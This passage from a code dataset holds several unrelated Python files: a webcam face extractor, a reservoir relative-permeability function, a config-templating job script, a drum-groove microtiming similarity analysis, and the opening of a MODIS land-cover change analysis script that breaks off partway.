nonlocal cameraIndex\n        nonlocal camera\n        \n        if not camera.isOpened():\n            camera.release()\n            print(\"[error] couldn't open camera. Aborting and trying new index.\")\n            cameraIndex += 1\n            cameraIndex = cameraIndex % 2\n            camera = cv2.VideoCapture(cameraIndex)\n            return []\n        \n        success, img = camera.read()\n        if not success:\n            print(\"[error] Couldn't read from webcam.\")\n            return []\n        \n        ans = engine.detect_with_image(\n            Image.fromarray(img),\n            threshold=0.05,\n            keep_aspect_ratio=False,\n            relative_coord=False,\n            top_k=10\n        )\n        \n        def result_getter(face):\n            x, y, x2, y2 = list(map(int, face.bounding_box.flatten().tolist()))\n            w = x2 - x\n            h = y2 - y\n            return (img[y:y + h, x:x + w], (x, y))\n        \n        if ans:\n            return list(map(result_getter, ans))\n        return []\n    return zoomer, width, height\n    \ndef make_webcam_face_getter():\n    # imageCount = 0\n    # Hooks up camera to the default video capture device.\n    camera = cv2.VideoCapture(0)\n    cameraIndex = 0\n    if not camera.isOpened():\n        camera = cv2.VideoCapture(1)\n        cameraIndex = 1\n\n    width, height = int(camera.get(3)), int(camera.get(4))\n\n    # The classifier we use. HAAR is slower than some other options, but\n    # is more accurate. We can tune this later.\n    faceCascade = cv2.CascadeClassifier(\"./models/haarcascade_frontalface_default.xml\")\n\n    def zoomer():\n        nonlocal cameraIndex\n        # nonlocal imageCount\n        nonlocal camera\n\n        if not camera.isOpened():\n            camera.release()\n            print(\"[error] couldn't open camera. Aborting and trying new index.\")\n            cameraIndex += 1\n            cameraIndex = cameraIndex % 2\n            camera = cv2.VideoCapture(cameraIndex)\n            return []\n\n        success, img = camera.read()\n\n        if not success:\n            print(\"[error] Couldn't read from webcam.\")\n            return []\n\n        greyscale = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n        # Perform the detection with some standard params.\n        faces = faceCascade.detectMultiScale(\n            greyscale,\n            minSize=(100, 100),\n        )\n        if len(faces) == 0:\n            return []\n\n        # faces = [max(faces, key=lambda f: f[2] * f[3])] # PICK BIGGEST FACE\n        extract_face = lambda f: (img[f[1]:f[1] + f[3], f[0]:f[0] + f[2]], (f[0], f[1]))\n\n        # face_filter = lambda f: f[2] > 100 and f[3] > 100\n        # faces = filter(face_filter, faces)\n\n        face_imgs = map(extract_face, faces)\n\n        return list(face_imgs)\n        # success = cv2.imwrite(\"images/\" + str(imageCount) + '.jpg', colorFace)\n\n        # if not success:\n        #     print(\"[error] Failed to write image to file.\")\n        #     return False\n        # imageCount += 1\n\n    return zoomer, width, height\n","sub_path":"webcam_face_extractor.py","file_name":"webcam_face_extractor.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"617514275","text":"\"\"\"\nreservoir simulation assignment 1\nCapillary pressure and relative permeability: Relative permeability\nAuthor: Mohammad Afzal Shadab\nEmail: mashadab@utexas.edu\nDate modified: 9/10/2020\n\"\"\"\nimport numpy as np\n\ndef rel_perm(petro,Sw):\n    \"\"\"s: saturation, s_wp: wetting percolation threshold, s_nwp: non-wetting percolation threshold, mu: viscosity, k_0: relative permeability threshold, n: power law parameter\"\"\"\n    \n    S =(Sw - petro.Swr)/(1.0 - petro.Sor - petro.Swr) #Normalized saturation\n    krw = petro.krw0 * S**petro.nw #Corey-Brooks model\n    kro = petro.kro0 *(1.0-S)**petro.no #Corey-Brooks model\n\n    #implementing percolation threshold conditions\n    #for water phase\n    if(Sw <= petro.Swr):\n        krw = np.nan\n        kro = np.nan\n    #for oil phase\n    if(Sw >= 1.0-petro.Sor):\n        krw = np.nan \n        kro = np.nan \n\n    return 
np.array([krw, kro], dtype=np.float64)","sub_path":"HW1/HW 1 Files/Problem 3/rel_perm.py","file_name":"rel_perm.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"248347152","text":"import sys, re\nfrom prepare_create import get_objects\nfrom tools.get_keys import get_nums\n\n# Start the job\ndef done(obj_name=None):\n\n    with open(r'datas/as_model_config.txt','r') as f:\n        config_text = f.read()\n    config_text = re.sub('HAITON_SECRET', get_nums(), config_text)\n\n    with open(r'datas/as_model_manage.txt','r') as f:\n        manage_text = f.read()\n\n    with open(r'datas/as_model_init.txt') as f:\n        init_text = f.read()\n\n    objname = obj_name or sys.argv[1]\n\n    get_objects(objname,config_text,manage_text,init_text)\n\n\nif __name__ == '__main__':\n    done()","sub_path":"auto_config/start_job.py","file_name":"start_job.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"50131295","text":"from xml.dom.minidom import parse\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport math\nimport csv\nimport editdistance as edcalc\nfrom scipy import stats\nimport os\nfrom collections import Counter\n\ndef addRelativePathToSystemPath(relPath):\n    if __name__ == '__main__' and __package__ is None:\n        from os import sys, path\n        sys.path.append(path.join(path.dirname(path.abspath(__file__)), relPath))\n\naddRelativePathToSystemPath(\"../shared\")\n\nfrom fx.bfd.groove import *\nfrom fx.common.filesystem import *\n\n\ndef getEuclideanRhythmDistance(a, b, aTiming, bTiming):\n    \"\"\"Returns norm-2 of a 1-D numpy array for CPU computation.\n    * faster than linalg.norm in case of 1-D arrays (numpy 1.9.2rc1).\n    \"\"\"\n\n    lA,mA,hA = splitKitParts3Ways(a)\n    a = np.hstack([lA,mA,hA])\n    lB,mB,hB = splitKitParts3Ways(b)\n    b = np.hstack([lB,mB,hB])\n    # x is flattened vector (96 long - 3parts x32) of the difference\n\n    lAT, mAT, hAT = splitKitParts3Ways(aTiming)\n    aTiming = np.nan_to_num(np.hstack([lAT, mAT, hAT]).flatten())*0.05\n    lBT, mBT, hBT = splitKitParts3Ways(bTiming)\n    bTiming = np.nan_to_num(np.hstack([lBT, mBT, hBT]).flatten())*0.05\n\n    aTransform = np.power(a,0.2).flatten()\n    bTransform = np.power(b,0.2).flatten()\n\n    #timingDifference = (aTiming-bTiming).flatten()\n    x = aTransform - bTransform\n    #x = (np.power(a,0.2).flatten()-np.power(b,0.2).flatten()) #put velocity weighting in here (as pow)\n\n    return math.sqrt(np.dot(x, x.T))\n\ndef getEuclideanRhythmDistance5PartsNoTiming(a,b):\n    aTransform = np.power(a,0.2).flatten()\n    bTransform = np.power(b,0.2).flatten()\n\n    x = (aTransform - bTransform)\n    euclideanDistance = math.sqrt(np.dot(x, x.T))\n    return euclideanDistance\n\ndef getEuclideanRhythmDistance5Parts(a,b,aTiming, bTiming):\n    aTransform = np.power(a,0.2).flatten()\n    bTransform = np.power(b,0.2).flatten()\n\n    timingDifference = np.nan_to_num((aTiming - bTiming)).flatten() #* 0.0095\n    #normalize\n    if np.absolute(timingDifference).max() != 0.0:\n        timingDifference = timingDifference/np.absolute(timingDifference).max()\n    else:\n        pass\n    w = 1+np.absolute(timingDifference)\n    x = (aTransform - bTransform) * w\n\n    euclideanDistance = math.sqrt(np.dot(x, x.T))\n    return euclideanDistance + (1*getTimingDistanceAverage(aTiming,bTiming))\n\n\ndef getTimingDistanceAverage(aTiming,bTiming):\n    # Get timing distance = weighted euclidean distance between average of timing distances.\n    # Works as a 
feature on its own or weighting factor for euclidean distance\n # 1 global weighting for whole thing - not step-by-step distance weightings\n aTimeAverage = np.sum(np.nan_to_num(aTiming), axis=1)\n bTimeAverage = np.sum(np.nan_to_num(bTiming), axis=1)\n aTimeAverage[aTimeAverage==0]=['nan']\n bTimeAverage[bTimeAverage==0]=['nan']\n\n x = np.nan_to_num(aTimeAverage-bTimeAverage).flatten()\n timingDistance = math.sqrt(np.dot(x,x.T)) * 0.0081\n return timingDistance\n\ndef getFlexibleEuclideanDistance(a,b, aTiming, bTiming):\n # get euclidean distance, but with 1 metrical distance lookahead/back\n # 1st thing - recreate euclidean distance with iteration (not array-wise calculation)\n #\n aTransform = np.power(a,0.2)\n bTransform = np.power(b,0.2)\n aTiming = (aTiming)\n bTiming = (bTiming)\n timingDifference = np.nan_to_num(aTiming - bTiming)\n\n # if np.absolute(timingDifference).max() != 0.0:\n # maxTiming = (np.absolute(timingDifference).max() + 125.0)\n # timingDifference = timingDifference/maxTiming\n # else:\n # maxTiming = 125.0\n # pass\n maxTiming = 125.\n timingDifference = timingDifference / 125.\n timingDifference = 1+np.absolute(timingDifference)\n\n # averagetiming not working - needs to be flattened\n averageATiming = np.hstack([np.sum(aTiming, axis=1), np.sum(aTiming, axis=1),\n np.sum(aTiming, axis=1),np.sum(aTiming, axis=1),np.sum(aTiming, axis=1)])\n averageBTiming = np.hstack([np.sum(bTiming, axis=1), np.sum(bTiming, axis=1),\n np.sum(bTiming, axis=1),np.sum(bTiming, axis=1),np.sum(bTiming, axis=1)])\n averageTimingDifference = (averageATiming-averageBTiming) *0.009\n x = np.zeros(aTransform.shape)\n tempo = 120.0\n stepTimeMS = 60.0 * 1000 / tempo / 4 # semiquaver step time in ms\n w = 0.00\n singleTimingDifference = 0\n for j in range(5):\n for i in range(31):\n if aTransform[i,j] != 0.0 and bTransform[i,j] != 0.0:\n x[i,j] = (aTransform[i,j] - bTransform[i,j]) * (timingDifference[i,j])\n #print('match', x[i,j], timingDifference[i,j])\n elif aTransform[i,j] != 0.0 and bTransform[i,j] == 0.0:\n if bTransform[(i+1)%32, j] != 0.0 and aTransform[(i+1)%32, j] == 0.0:\n singleTimingDifference = np.nan_to_num(aTiming[i,j]) - np.nan_to_num(bTiming[(i+1)%32,j]) + stepTimeMS\n if singleTimingDifference < 125.:\n singleTimingDifference = 1 + abs(singleTimingDifference/maxTiming)\n x[i,j] = (aTransform[i,j] - bTransform[(i+1)%32,j]) * singleTimingDifference\n else:\n x[i, j] = (aTransform[i, j] - bTransform[i, j]) * timingDifference[i, j]\n\n # print(singleTimingDifference)\n # print(\"lookahead\", x[i,j])\n #\n # print(\"b+1\", bTransform[(i+1)%32,j])\n # print(\"unedited\",(aTransform[i,j]*timingDifference[i,j]),(bTransform[i,j]*timingDifference[i,j]))\n\n # print('should be smaller',x[i,j])\n elif bTransform[(i-1)%32,j] != 0.0 and aTransform[(i-1)%32, j] == 0.0:\n singleTimingDifference = np.nan_to_num(aTiming[i,j]) - np.nan_to_num(bTiming[(i-1)%32,j]) - stepTimeMS\n\n if singleTimingDifference > -125.:\n singleTimingDifference = 1 + abs(singleTimingDifference/maxTiming)\n # print('should be smaller', x[i, j])\n x[i,j] = (aTransform[i,j] - bTransform[(i-1)%32,j]) * singleTimingDifference\n else:\n x[i, j] = (aTransform[i, j] - bTransform[i, j]) * timingDifference[i, j]\n else:\n x[i, j] = (aTransform[i, j] - bTransform[i, j]) * timingDifference[i, j]\n # print('should be larger', x[i,j])\n\n elif aTransform[i,j] == 0.0 and bTransform[i,j] != 0.0:\n if bTransform[(i + 1) % 32, j] != 0.0 and aTransform[(i + 1) % 32, j] == 0.0:\n singleTimingDifference = np.nan_to_num(aTiming[i,j]) 
- np.nan_to_num(bTiming[(i+1)%32,j]) + stepTimeMS\n if singleTimingDifference < 125.:\n singleTimingDifference = 1 + abs(singleTimingDifference/maxTiming)\n x[i,j] = (aTransform[i,j] - bTransform[(i+1)%32,j]) * singleTimingDifference\n else:\n x[i, j] = (aTransform[i, j] - bTransform[i, j]) * timingDifference[i, j]\n\n elif bTransform[(i-1)%32,j] != 0.0 and aTransform[(i-1)%32, j] == 0.0:\n singleTimingDifference = np.nan_to_num(aTiming[i,j]) - np.nan_to_num(bTiming[(i-1)%32,j]) - stepTimeMS\n if singleTimingDifference > -125.:\n singleTimingDifference = 1 + abs(singleTimingDifference/maxTiming)\n x[i,j] = (aTransform[i,j] - bTransform[(i-1)%32,j]) * singleTimingDifference\n\n else:\n x[i, j] = (aTransform[i, j] - bTransform[i, j]) * timingDifference[i, j]\n\n else: # if no nearby onsets, need to count difference between onset and 0 value.\n x[i, j] = (aTransform[i, j] - bTransform[i, j]) * timingDifference[i, j]\n\n\n flexDistance = math.sqrt(np.dot(x.flatten(),x.flatten().T))\n #print(flexDistance)\n\n if flexDistance < 0.5:\n pass\n # print(x)\n # print(aTransform,bTransform)\n # print(x)\n # print(aTiming)\n # print(bTiming)\n return flexDistance\n # go through a, and if hit[i] in b = 0, check hit [i+1] and [i-1]\n\ndef getSwingFeatures(aTiming, bTiming, aName, bName):\n # first - get probability of swing\n # swing positions - 4th semiquavers. Tested 'soft swing' semiquaver positions before - doesn't work'\n swingPositions = 3,7,11,15,19,23,27,31\n\n\n aTimeAverage = np.sum(np.nan_to_num(aTiming), axis=1)\n bTimeAverage = np.sum(np.nan_to_num(bTiming), axis=1)\n aTimeAverage[aTimeAverage==0]=['nan']\n bTimeAverage[bTimeAverage==0]=['nan']\n\n aSwingCount = 0.0\n bSwingCount = 0.0\n oneStep = 125.0\n secondQuaversA = np.zeros([8])\n secondQuaversB = np.zeros([8])\n\n j=0 #check for swung notes\n for i in swingPositions:\n if aTimeAverage[i] < -25.0:\n aSwingCount += 1\n secondQuaversA[j] = 125.0 - aTimeAverage[i]\n if bTimeAverage[i] < - 25.0:\n bSwingCount += 1\n secondQuaversB[j] = 125.0 - bTimeAverage[i]\n j+=1\n shortQuaverA = np.mean(secondQuaversA[secondQuaversA!=0])\n shortQuaverB = np.mean(secondQuaversB[secondQuaversB!=0])\n\n #check for triplet notes\n tripletPositions = 1,5,9,13,17,21,25,29\n aTripletCount = 0.0\n bTripletCount = 0.0\n\n for i in tripletPositions:\n if aTimeAverage[i] > 35.0:\n aTripletCount+=1\n if bTimeAverage[i] > 35.0:\n bTripletCount += 1\n\n longQuaverA = 500.0 - shortQuaverA\n longQuaverB = 500.0 - shortQuaverB\n\n swingRatioA = longQuaverA / shortQuaverA\n swingRatioB = longQuaverB / shortQuaverB\n if np.isnan(swingRatioA):\n swingRatioA = 1.0\n if np.isnan(swingRatioB):\n swingRatioB = 1.0\n #print(swingDistance, aName, bName)\n\n # print(aSwingCount,aTripletCount, aName)\n # print(bSwingCount,bTripletCount, bName)\n # if aName == 'Country Swing Fill 13':\n # print(aTiming)\n # print(aTimeAverage)\n aSwing = np.ceil(aSwingCount/8.0)\n bSwing = np.ceil(bSwingCount/8.0)\n\n unweightedDistance = abs(aSwing - bSwing)\n\n swingSalienceWeight = 1+ abs(aSwingCount/8.0 - bSwingCount/8.0)\n swingRatioWeight = 1+abs(swingRatioA-swingRatioB)\n\n wA = pow(aSwingCount/8.0,0.1)\n wB = pow(bSwingCount/8.0,0.1)\n # wA = pow((aSwingCount/8.0 + swingRatioA),2)\n # wB = pow((bSwingCount/8.0 + swingRatioB),2)\n #print(wA,wB)\n # print(wA, 'A swing salience', swingRatioA, aSwingCount)\n # print(wB, 'B swing salience', swingRatioB, bSwingCount)\n\n swingDistance = abs((wA) - (wB))#*unweightedDistance #=1 - one is swung and other isn't. =0 - both swung/both unswung. 
1 diff 0 same\n #swingDistance = abs(np.ceil(aTripletCount/8.0) - np.ceil(bTripletCount/8.0))\n # need to reduce 1 values according to swing salience. if swing s is low, reduce. if high don't reduce/reduce less/\n #print('Weighted Distance = ', swingDistance, 'Unweighted = ', unweightedDistance, aName, bName)\n return swingDistance# * swingRatioWeight * swingSalienceWeight\n\ndef getTimingStyle(aTiming,bTiming,aName, bName):\n # for each step, see if there is a kick or snare present\n # then see if there is a hihat present?\n # count boolean features for each bar individually\n # in tweaking - need to make sure loops in the same palette/genre are the same\n\n lA,mA,hA = splitKitParts3Ways(aTiming)\n a = np.vstack([lA,mA,hA]).T\n lB,mB,hB = splitKitParts3Ways(bTiming)\n b = np.vstack([lB,mB,hB]).T #need to go back to nan values\n aBar1,aBar2 = np.split(a,2)\n bBar1,bBar2 = np.split(b,2)\n aBooleanFeatures = np.clip(getBooleanFeatures(aBar1),0,1)\n bBooleanFeatures = np.clip(getBooleanFeatures(bBar1),0,1)\n #print(aBooleanFeatures, aName)\n #print(bBooleanFeatures, bName)\n # print(a)\n # print(b)\n #print(\"\\n\")\n x = aBooleanFeatures-bBooleanFeatures\n\n distance = math.sqrt(np.dot(x, x.T))\n\n return distance\n\ndef getBooleanFeatures(timing):\n # just one bar\n features = np.zeros([16])\n\n # booleanFeatures\n # 0 'kickLate1'\n # 1 'kickEarly1'\n # 2 'snareLate2'\n # 3 'snareEarly2'\n # 4 'kickLate3'\n # 5 'kickEarly3'\n # 6 'snareLate4'\n # 7 'snareEarly4'\n #\n # 8 'kickHHLateGrid1'\n # 9'kickHHEarlyGrid1'\n # 10'snareHHLateGrid2'\n # 11'snareHHEarlyGrid2'\n # 12'kickHHLateGrid3'\n # 13'kickHHEarlyGrid3'\n # 14'snareHHLateGrid4'\n # 15'snareHHEarlyGrid4'\n # }\n# check hihat OR kick/snare.\n for k in 0,2:\n kickT1 = timing[0+k,0]\n hhT1 = timing[0+k,2]\n snT2 = timing[4+k,1]\n hhT2 = timing[4+k,2]\n kickT3 = timing[8+k,0]\n hhT3 = timing[8+k,2]\n snT4 = timing[12+k,1]\n hhT4 = timing[12+k,2]\n\n t = 10.0\n if kickT1 > t or hhT1 > t:\n features[0] = 1\n if kickT1 < -t or hhT1 < -t:\n features[1] = 1\n if snT2 > t or hhT2 > t:\n features[2] = 1\n if snT2 < -t or hhT2 < -t:\n features[3] = 1\n\n if kickT3 > t or hhT3 > t:\n features[4] = 1\n if kickT3 < -t or hhT3 < -t:\n features[5] = 1\n if snT4 > t or hhT4 > t:\n features[6] = 1\n if snT4 < -t or hhT4 < -t:\n features[7] = 1\n\n if kickT1 > hhT1 + t:\n features[8] = 1\n if kickT1 < hhT1 -t:\n features[9] = 1\n if snT2 > hhT2 + t:\n features[10] = 1\n if snT2 < hhT2 -t:\n features[11] = 1\n\n if kickT3 > hhT3 + t:\n features[12] = 1\n if kickT3 < hhT3 -t:\n features[13] = 1\n if snT4 > hhT4 + t:\n features[14] = 1\n if snT4 < hhT4 -t:\n features[15] = 1\n\n return features\n\ndef getHammingDistance(a, b):\n # Same as euclidean, without velocity\n binaryA = np.ceil(a)\n binaryB = np.ceil(b)\n lA,mA,hA = splitKitParts3Ways(a)\n a = np.hstack([lA,mA,hA])\n lB,mB,hB = splitKitParts3Ways(b)\n b = np.hstack([lB,mB,hB])\n return np.count_nonzero(a != b)\n\ndef splitKitParts3Ways(groove):\n kick = groove[:,0]\n snare = groove[:,1]\n closed = groove[:,2]\n open = groove[:,3]\n tom = groove[:,4]\n\n low = kick\n mid = np.nansum(np.dstack((snare,tom)),2)\n high = np.nansum(np.dstack((closed,open)),2)\n #mid = np.clip(snare + tom, 0, 1)\n #high = np.clip(closed + open, 0, 1)\n\n return low, mid, high\n\ndef getModelCorrelation(scoresBySubject, allGrooves, allNames, allTimings):\n allEuclideanDistances = []\n allEuclideanNoTiming = []\n allTimingDistances = []\n allFlexibleDistances = []\n allStyleDistances = []\n allSwingDistances = []\n j=0\n 
with open(\"/home/fred/BFD/python/Similarity-Eval/eval-pairings-reduced.csv\") as csvfile:\n reader = csv.reader(csvfile, delimiter=\",\")\n for row in reader:\n aName = row[0]\n bName = row[1]\n for i in range(len(allNames)):\n if allNames[i] == aName:\n a = allGrooves[i]\n aTiming = allTimings[i]\n if allNames[i] == bName:\n b = allGrooves[i]\n bTiming = allTimings[i]\n euclideanRhythmDistance = getEuclideanRhythmDistance5Parts(a,b, aTiming, bTiming)\n euclideanNoTiming = getEuclideanRhythmDistance5PartsNoTiming(a,b)\n timingDistance = getTimingDistanceAverage(aTiming,bTiming)\n flexibleEuclideanDistance = getFlexibleEuclideanDistance(a,b,aTiming,bTiming)\n styleDistance = getTimingStyle(aTiming,bTiming,aName,bName)\n swingDistance = getSwingFeatures(aTiming,bTiming,aName,bName)\n\n allEuclideanDistances.append(euclideanRhythmDistance)\n allEuclideanNoTiming.append(euclideanNoTiming)\n allTimingDistances.append(timingDistance)\n allFlexibleDistances.append(flexibleEuclideanDistance)\n allStyleDistances.append(styleDistance)\n allSwingDistances.append(swingDistance)\n\n # print(aName + \" \" + bName + ' Euclidean = ' + str(euclideanRhythmDistance) + \"Hamming = \"\n # + str(hammingDistance))\n #print(round(meanScores[j],2))\n j=j+1\n\n\n\n\n # plt.figure()\n # plt.bar(np.arange(80),np.mean(scoresBySubject, axis=0))\n #\n # plt.figure()\n # plt.hold(True)\n # plt.bar(np.arange(80),allEuclideanDistances)\n # plt.title(\"Euclidean Distances\")\n #\n # plt.figure()\n # plt.bar(np.arange(80),allHammingDistances)\n # plt.title(\"Hamming Distances\")\n #\n # plt.figure()\n # plt.bar(np.arange(80),allGomezDistances)\n # plt.title(\"Gomez Feature Distances\")\n #\n # plt.figure()\n # plt.bar(np.arange(80),allWitekDistances)\n # plt.title(\"Witek Feature Distances\")\n #\n # plt.figure()\n # plt.bar(np.arange(80),allPanteliDistances)\n # plt.title(\"Panteli Feature Distances\")\n\n plotCorrelation(np.array(allEuclideanNoTiming),np.array(allFlexibleDistances),np.array(allSwingDistances),np.array(allTimingDistances),meanScores)\n\n # coeff1, p1 = stats.spearmanr(meanScores,np.array(allEuclideanNoTiming))\n # coeff2, p2 = stats.spearmanr(meanScores,np.array(allEuclideanDistances))\n # coeff3, p3 = stats.spearmanr(meanScores,np.array(allFlexibleDistances))\n # coeff4, p4 = stats.spearmanr(np.array(allEuclideanNoTiming),np.array(allEuclideanDistances))\n coeff5, p5 = stats.spearmanr(meanScores,np.array(allTimingDistances))\n coeff6, p6 = stats.spearmanr(meanScores,np.array(allStyleDistances))\n coeff7, p7 = stats.spearmanr(meanScores,np.array(allSwingDistances))\n\n # print(\"Euclidean No Timing r: \", coeff1,p1)\n # print(\"Euclidean Timing Weighting r: \", coeff2,p2)\n # print(\"Flex Euclidean r: \", coeff3,p3)\n # print(\"Inter feature r: \", coeff4,p4)\n\n print(\"Just timing average r: \", coeff5,p5)\n print(\"Timing Style distance average r: \", coeff6,p6)\n print(\"Swing feature distance r: \", coeff7,p7)\n\ndef plotCorrelation(a,b,c,d, scores):\n plt.figure()\n #plt.hold()\n\n #plt.scatter(a/8.0,scores,marker='x')\n #plt.scatter(b/8.0,scores,marker='x')\n plt.scatter(c,scores,marker='x')\n #plt.scatter(d/1.75,scores,marker='x')\n plt.title(\"Swing Feature vs Similarity Ratings Correlation for 80 Loop Pairs\")\n plt.ylabel(\"Ratings\")\n plt.xlabel(\"Feature score\")\n plt.show()\n\ndef getResultsPerPair(scoresByPair):\n # tested, works\n for i in range(80): #just non-repeated ones\n with open(('/home/fred/BFD/python/MusicSOM/ratings/' + ratingFiles[i])) as csvfile:\n reader = csv.reader(csvfile, 
delimiter=\",\") #so far 21 participants\n j = 0\n for row in reader:\n if row[0] in (None, \"\"):\n pass\n elif row[0] == \"file_keys\":\n pass\n elif j < 21:\n scoresByPair[i,j] = row[1]\n j+=1\n return scoresByPair\n\nnp.set_printoptions(precision=2)\n\nallNames = np.load('Eval-Groove-names.npy')\nallGrooves = np.load('Eval-Groove-velocity-matricies.npy')\nallTimings = np.load('Eval-Groove-timing-matricies.npy')\n\nratingFiles = os.listdir('/home/fred/BFD/python/MusicSOM/ratings')\n\nratingFiles.sort() #alphabetize\nratingFiles = ratingFiles[10:90]\nscoresByPair = np.zeros([80,21])\n\n\nscoresBySubject = getResultsPerPair(scoresByPair).T\nmeanScores = 1.0 - np.mean(scoresBySubject, axis=0)\nprint(meanScores)\n\ngetModelCorrelation(scoresBySubject, allGrooves, allNames, allTimings)\n","sub_path":"Microtiming-Feature-Testing.py","file_name":"Microtiming-Feature-Testing.py","file_ext":"py","file_size_in_byte":19717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"194982765","text":"\"\"\"\r\n\r\nThis script is mainly for analyzing the results of the Max_Change_Analyses.py\r\nThe main goal is to plot the changes in ET, albedo and LST following a major change in LUC\r\n\r\nThere are seven classes in general which in this scriot is numbered from 1 to 7 where numbers are: \r\n1: EF (Evergreen forest); 2:DF (Decisuous forest); 3:shrub; \r\n4: Herbacious; 5:sparse; 6:wetland; and 7:water \r\n\r\n\"\"\"\r\n# Loading the libraries\r\nimport xarray as xr\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pylab as plt\r\n\r\n'''---------------------------------------------------------\r\n\t\t\t\t\t\t\tParameters\r\n---------------------------------------------------------'''\r\nanalyses_mode = \"Growing\" \r\nLUC_Type = [\r\n\t\"Evergreen Forest\",\r\n\t\"Deciduous Forest\", \r\n\t\"Shrub\",\r\n\t\"Herbaceous\",\r\n\t\"Sparse\",\r\n\t\"Wetland\",\r\n\t\"Water\"\r\n\t]\r\n\r\n'''---------------------------------------------------------\r\n\t\t\t\t\t\t\tPrepare data\r\n---------------------------------------------------------'''\r\nprint('----------------- Preparing data -----------------\\n')\r\nin_dir = \"/data/home/hamiddashti/mnt/nasa_above/working/modis_analyses/Data/\"\r\nout_dir = \"/data/home/hamiddashti/mnt/nasa_above/working/modis_analyses/outputs/\"\r\nfig_dir = out_dir + \"Main_Max_Change/Figures/\"+analyses_mode+\"/\"\r\n\r\nif analyses_mode==\"Growing\":\r\n\tprint(\"Analyses mode is set to Growing, meaning we are working on the growing season (Apr-Nov; seven months)\\n\")\r\nelif analyses_mode==\"Annual\":\r\n\tprint(\"Analyses mode is set to Annual, meaning we are working on the annual data (Jan-Dec)\\n\")\r\nprint(f\"Input directory:{in_dir}\")\r\nprint(f\"Output directory:{out_dir}\")\r\nprint(f\"Figure directory:{fig_dir}\\n\")\r\n\r\nprint(\"Working on LST...\")\r\n# importing LST (natural and LUC components)\r\nlst_lulc = xr.open_dataarray(\r\n\tout_dir\r\n\t+ \"Natural_Variability/Natural_Variability_\"+analyses_mode+\"_outputs/delta_lst_changed_lulc_component.nc\"\r\n)\r\n\r\nlst_nv = xr.open_dataarray(\r\n\tout_dir\r\n\t+ \"Natural_Variability/Natural_Variability_\"+analyses_mode+\"_outputs/delta_lst_changed_nv_component.nc\"\r\n)\r\nlst_diff_total = xr.open_dataarray(\r\n\tout_dir\r\n\t+ \"Natural_Variability/Natural_Variability_\"+analyses_mode+\"_outputs/delta_lst_total.nc\"\r\n)\r\nlst = (\r\n\txr.open_dataarray(in_dir +analyses_mode+\"/\"+analyses_mode+\"_LST/lst_mean_\"+analyses_mode+\".nc\") - 
273.15\r\n) # kelvin to C\r\nlst = lst.sel(year=slice(\"2003\", \"2014\"))\r\nlst = lst.rename({\"lat\": \"y\", \"lon\": \"x\"})\r\n\r\nprint(\"Working on albedo...\")\r\nalbedo = xr.open_dataarray(in_dir + analyses_mode+\"/\"+analyses_mode+\"_Albedo/Albedo_\"+analyses_mode+\".nc\")\r\nalbedo = albedo.sel(year=slice(\"2003\", \"2014\"))\r\nalbedo_diff = albedo.diff(\"year\")\r\n\r\nprint(\"Working on ET and its components...\\n\")\r\nEC = xr.open_dataarray(in_dir + analyses_mode+\"/\"+analyses_mode+\"_ET/EC_\"+analyses_mode+\".nc\") # Vegetation transpiration\r\nEI = xr.open_dataarray(in_dir + analyses_mode+\"/\"+analyses_mode+\"_ET/EI_\"+analyses_mode+\".nc\") # Canopy interception evaporation\r\nES = xr.open_dataarray(in_dir + analyses_mode+\"/\"+analyses_mode+\"_ET/ES_\"+analyses_mode+\".nc\") # Soil evaporation\r\nEW = xr.open_dataarray(in_dir + analyses_mode+\"/\"+analyses_mode+\"_ET/EW_\"+analyses_mode+\".nc\") # Water/snow/ice evaporation\r\nET = xr.open_dataarray(in_dir + analyses_mode+\"/\"+analyses_mode+\"_ET/ET_\"+analyses_mode+\".nc\") # Total evapotranspiration\r\nEC = EC.fillna(0)\r\nEI = EI.fillna(0)\r\nES = ES.fillna(0)\r\nEW = EW.fillna(0)\r\n\r\nECI = EC + EI # canopy evapotranspiration\r\nESW = ES + EW # soil/water/ice/snow evaporation\r\n\r\nEC = EC.where(EC != 0) # Convert zeros to nan\r\nEI = EI.where(EI != 0)\r\nES = ES.where(ES != 0)\r\nEW = EW.where(EW != 0)\r\nET = ET.where(ET != 0)\r\nECI = ECI.where(ECI != 0)\r\nESW = ESW.where(ESW != 0)\r\n#Take the difference in ET \r\nEC_diff = EC.diff(\"year\")\r\nEI_diff = EI.diff(\"year\")\r\nES_diff = ES.diff(\"year\")\r\nEW_diff = EW.diff(\"year\")\r\nET_diff = ET.diff(\"year\")\r\nECI_diff = ECI.diff(\"year\")\r\nESW_diff = ESW.diff(\"year\")\r\n\r\n# EW.isel(year=1).to_netcdf(out_dir+\"test2_ew.nc\")\r\n# This is a netcdf file that shows all the extreme conversions calculated using the \"Max_Change_Analyses.py\"\r\nconversions = xr.open_dataarray(\r\n\tout_dir + \"LUC_Change_Extracted/LUC_max_conversions/conversions_Table.nc\"\r\n)\r\n\r\nconversions_sum = conversions.sum(\"year\")\r\nconversions_sum = pd.DataFrame(data = conversions_sum.values,index = LUC_Type,columns=LUC_Type)\r\n\r\nwith open(out_dir +analyses_mode+\"_report.txt\", \"w\") as text_file:\r\n    print(\"Number of pixels that have undergone extreme conversion. Rows/columns are\\\r\n    classes before/after conversion (Table XXXX in the paper):\",\r\n    file=text_file,\r\n    )\r\n    print(conversions_sum, file=text_file)\r\ntext_file.close()\r\nprint(\"Number of pixels that have undergone extreme conversion. 
